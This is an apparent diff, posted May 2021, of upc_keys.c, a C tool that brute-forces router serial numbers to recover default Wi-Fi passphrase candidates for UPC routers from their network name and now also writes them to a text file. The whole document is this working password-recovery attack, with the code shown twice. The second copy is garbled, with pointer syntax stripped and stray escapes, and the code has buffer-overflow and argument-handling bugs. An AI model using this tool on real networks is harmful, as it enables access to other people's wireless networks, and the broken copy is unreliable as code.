step135 · May 20, 2021 15:24
diff --git a/upc_keys.c b/upc_keys.c
 /*
 *
 * 2016-01-08: Added support for 5GHz networks. Specifying network
 * type is optional. As a bonus you get less candidates. :-)
 *
 * 2021-05-20: All generated passwords are stored in a text file.
 *
 * P.S. Reversing eCos and broadcom CFE sux
 *
 * $ gcc -O2 -o upc_keys upc_keys.c -lcrypto 
 *
 * References
 * [1] https://www.usenix.org/system/files/conference/woot15/woot15-paper-lorente.pdf
 * [2] http://archive.hack.lu/2015/hacklu15_enovella_reversing_routers.pdf
 *
 */

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <stdint.h>
 #include <openssl/md5.h>

 #define MAGIC_24GHZ 0xff8d8f20
 #define MAGIC_5GHZ 0xffd9da60
 #define MAGIC0 0xb21642c9ll
 #define MAGIC1 0x68de3afll
 #define MAGIC2 0x6b5fca6bll

 #define MAX0 9
 #define MAX1 99
 #define MAX2 9
 #define MAX3 9999

 #define PREFIX_DELIMITER ","
 #define DEFULT_PREFIXES "SAAP,SAPP,SBAP,UAAP"

 void hash2pass(uint8_t *in_hash, char *out_pass)
 {
 	uint32_t i, a;

 	for (i = 0; i < 8; i++) {
 		a = in_hash[i] & 0x1f;
 		a -= ((a * MAGIC0) >> 36) * 23;

 		a = (a & 0xff) + 0x41;

 		if (a >= 'I') a++;
 		if (a >= 'L') a++;
 		if (a >= 'O') a++;

 		out_pass[i] = a;
 	}
 	out_pass[8] = 0;
 }

 uint32_t mangle(uint32_t *pp)
 {
 	uint32_t a, b;

 	a = ((pp[3] * MAGIC1) >> 40) - (pp[3] >> 31);
 	b = (pp[3] - a * 9999 + 1) * 11ll;

 	return b * (pp[1] * 100 + pp[2] * 10 + pp[0]);
 }

 uint32_t upc_generate_ssid(uint32_t* data, uint32_t magic)
 {
 	uint32_t a, b;

 	a = data[1] * 10 + data[2];
 	b = data[0] * 2500000 + a * 6800 + data[3] + magic;

 	return b - (((b * MAGIC2) >> 54) - (b >> 31)) * 10000000;
 }

 void usage(char *prog)
 {
 	fprintf(stderr, "  Usage: %s <ESSID> <PREFIXES>\n", prog);
 	fprintf(stderr, "   - ESSID should be in 'UPCxxxxxxx' format\n");
 	fprintf(stderr, "   - PREFIXES should be a string of comma separated serial number prefixes\n\n");
 }

 int main(int argc, char *argv[])
 {
 	uint32_t buf[4], target;
 	char serial[64];
 	char serial_input[64];
 	char pass[9], tmpstr[17];
 	uint8_t h1[16], h2[16];
 	uint32_t hv[4], w1, w2, i, j;
 	int mode, prefix_cnt;
 	char *prefix;
 	char passwords[1000] = "";
 	char filename[15] = "";

 	if(argc != 3) {
 		printf("Default list of prefixes will be used!\n\n", argc);
 	}

 	if (strlen(argv[1]) != 10 || memcmp(argv[1], "UPC", 3) != 0) {
 		usage(argv[0]);
 		return 1;
 	}

 	strcat(filename, argv[1]);
 	strcat(filename, ".txt");

 	char prefixes[strlen(argv[2] ? argv[2] : DEFULT_PREFIXES) + 1];
 	target = strtoul(argv[1] + 3, NULL, 0);

 	MD5_CTX ctx;

 	for (buf[0] = 0; buf[0] <= MAX0; buf[0]++)
 	for (buf[1] = 0; buf[1] <= MAX1; buf[1]++)
 	for (buf[2] = 0; buf[2] <= MAX2; buf[2]++)
 	for (buf[3] = 0; buf[3] <= MAX3; buf[3]++) {
 		mode = 0;
 		if (upc_generate_ssid(buf, MAGIC_24GHZ) == target) {
 			mode = 1;
 		}
 		if (upc_generate_ssid(buf, MAGIC_5GHZ) == target) {
 			mode = 2;
 		}
 		if (mode != 1 && mode != 2) {
 			continue;
 		}

 		strcpy(prefixes, argv[2] ? argv[2] : DEFULT_PREFIXES);
 		prefix = strtok(prefixes, PREFIX_DELIMITER);
 		while (prefix != NULL) {
 			sprintf(serial, "%s%d%02d%d%04d", prefix, buf[0], buf[1], buf[2], buf[3]);
 			memset(serial_input, 0, 64);

 			if (mode == 2) {
 				for(i=0; i<strlen(serial); i++) {
 					serial_input[strlen(serial)-1-i] = serial[i];
 				}
 			} else {
 				memcpy(serial_input, serial, strlen(serial));
 			}

 			MD5_Init(&ctx);
 			MD5_Update(&ctx, serial_input, strlen(serial_input));
 			MD5_Final(h1, &ctx);

 			for (i = 0; i < 4; i++) {
 				hv[i] = *(uint16_t *)(h1 + i*2);
 			}

 			w1 = mangle(hv);

 			for (i = 0; i < 4; i++) {
 				hv[i] = *(uint16_t *)(h1 + 8 + i*2);
 			}

 			w2 = mangle(hv);

 			sprintf(tmpstr, "%08X%08X", w1, w2);

 			MD5_Init(&ctx);
 			MD5_Update(&ctx, tmpstr, strlen(tmpstr));
 			MD5_Final(h2, &ctx);

 			hash2pass(h2, pass);
 			printf("%s,%s,%d\n", serial, pass, mode);
 			strcat(passwords, pass);
 			strcat(passwords, "\n"); 
 			prefix = strtok(NULL, PREFIX_DELIMITER);
 		}
 	}

 	FILE *fp;
 	fp = fopen(filename, "w+");
 	fprintf(fp, passwords);
 	fclose(fp);

 	return 0;
 }
	/*
	*
	* 2016-01-08: Added support for 5GHz networks. Specifying network
	* type is optional. As a bonus you get less candidates. :-)
	*
	* 2021-05-20: All generated passwords are stored in a text file.
	*
	* P.S. Reversing eCos and broadcom CFE sux
	*
	* $ gcc -O2 -o upc_keys upc_keys.c -lcrypto
	*
	* References
	* [1] https://www.usenix.org/system/files/conference/woot15/woot15-paper-lorente.pdf
	* [2] http://archive.hack.lu/2015/hacklu15_enovella_reversing_routers.pdf
	*
	*/

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <stdint.h>
	#include <openssl/md5.h>

	#define MAGIC_24GHZ 0xff8d8f20
	#define MAGIC_5GHZ 0xffd9da60
	#define MAGIC0 0xb21642c9ll
	#define MAGIC1 0x68de3afll
	#define MAGIC2 0x6b5fca6bll

	#define MAX0 9
	#define MAX1 99
	#define MAX2 9
	#define MAX3 9999

	#define PREFIX_DELIMITER ","
	#define DEFULT_PREFIXES "SAAP,SAPP,SBAP,UAAP"

	void hash2pass(uint8_t in_hash, char out_pass)
	{
	uint32_t i, a;

	for (i = 0; i < 8; i++) {
	a = in_hash[i] & 0x1f;
	a -= ((a * MAGIC0) >> 36) * 23;

	a = (a & 0xff) + 0x41;

	if (a >= 'I') a++;
	if (a >= 'L') a++;
	if (a >= 'O') a++;

	out_pass[i] = a;
	}
	out_pass[8] = 0;
	}

	uint32_t mangle(uint32_t *pp)
	{
	uint32_t a, b;

	a = ((pp[3] * MAGIC1) >> 40) - (pp[3] >> 31);
	b = (pp[3] - a * 9999 + 1) * 11ll;

	return b * (pp[1] * 100 + pp[2] * 10 + pp[0]);
	}

	uint32_t upc_generate_ssid(uint32_t* data, uint32_t magic)
	{
	uint32_t a, b;

	a = data[1] * 10 + data[2];
	b = data[0] * 2500000 + a * 6800 + data[3] + magic;

	return b - (((b * MAGIC2) >> 54) - (b >> 31)) * 10000000;
	}

	void usage(char *prog)
	{
	fprintf(stderr, " Usage: %s <ESSID> <PREFIXES>\n", prog);
	fprintf(stderr, " - ESSID should be in 'UPCxxxxxxx' format\n");
	fprintf(stderr, " - PREFIXES should be a string of comma separated serial number prefixes\n\n");
	}

	int main(int argc, char *argv[])
	{
	uint32_t buf[4], target;
	char serial[64];
	char serial_input[64];
	char pass[9], tmpstr[17];
	uint8_t h1[16], h2[16];
	uint32_t hv[4], w1, w2, i, j;
	int mode, prefix_cnt;
	char *prefix;
	char passwords[1000] = "";
	char filename[15] = "";

	if(argc != 3) {
	printf("Default list of prefixes will be used!\n\n", argc);
	}

	if (strlen(argv[1]) != 10 \|\| memcmp(argv[1], "UPC", 3) != 0) {
	usage(argv[0]);
	return 1;
	}

	strcat(filename, argv[1]);
	strcat(filename, ".txt");

	char prefixes[strlen(argv[2] ? argv[2] : DEFULT_PREFIXES) + 1];
	target = strtoul(argv[1] + 3, NULL, 0);

	MD5_CTX ctx;

	for (buf[0] = 0; buf[0] <= MAX0; buf[0]++)
	for (buf[1] = 0; buf[1] <= MAX1; buf[1]++)
	for (buf[2] = 0; buf[2] <= MAX2; buf[2]++)
	for (buf[3] = 0; buf[3] <= MAX3; buf[3]++) {
	mode = 0;
	if (upc_generate_ssid(buf, MAGIC_24GHZ) == target) {
	mode = 1;
	}
	if (upc_generate_ssid(buf, MAGIC_5GHZ) == target) {
	mode = 2;
	}
	if (mode != 1 && mode != 2) {
	continue;
	}

	strcpy(prefixes, argv[2] ? argv[2] : DEFULT_PREFIXES);
	prefix = strtok(prefixes, PREFIX_DELIMITER);
	while (prefix != NULL) {
	sprintf(serial, "%s%d%02d%d%04d", prefix, buf[0], buf[1], buf[2], buf[3]);
	memset(serial_input, 0, 64);

	if (mode == 2) {
	for(i=0; i<strlen(serial); i++) {
	serial_input[strlen(serial)-1-i] = serial[i];
	}
	} else {
	memcpy(serial_input, serial, strlen(serial));
	}

	MD5_Init(&ctx);
	MD5_Update(&ctx, serial_input, strlen(serial_input));
	MD5_Final(h1, &ctx);

	for (i = 0; i < 4; i++) {
	hv[i] = (uint16_t )(h1 + i*2);
	}

	w1 = mangle(hv);

	for (i = 0; i < 4; i++) {
	hv[i] = (uint16_t )(h1 + 8 + i*2);
	}

	w2 = mangle(hv);

	sprintf(tmpstr, "%08X%08X", w1, w2);

	MD5_Init(&ctx);
	MD5_Update(&ctx, tmpstr, strlen(tmpstr));
	MD5_Final(h2, &ctx);

	hash2pass(h2, pass);
	printf("%s,%s,%d\n", serial, pass, mode);
	strcat(passwords, pass);
	strcat(passwords, "\n");
	prefix = strtok(NULL, PREFIX_DELIMITER);
	}
	}

	FILE *fp;
	fp = fopen(filename, "w+");
	fprintf(fp, passwords);
	fclose(fp);

	return 0;
	}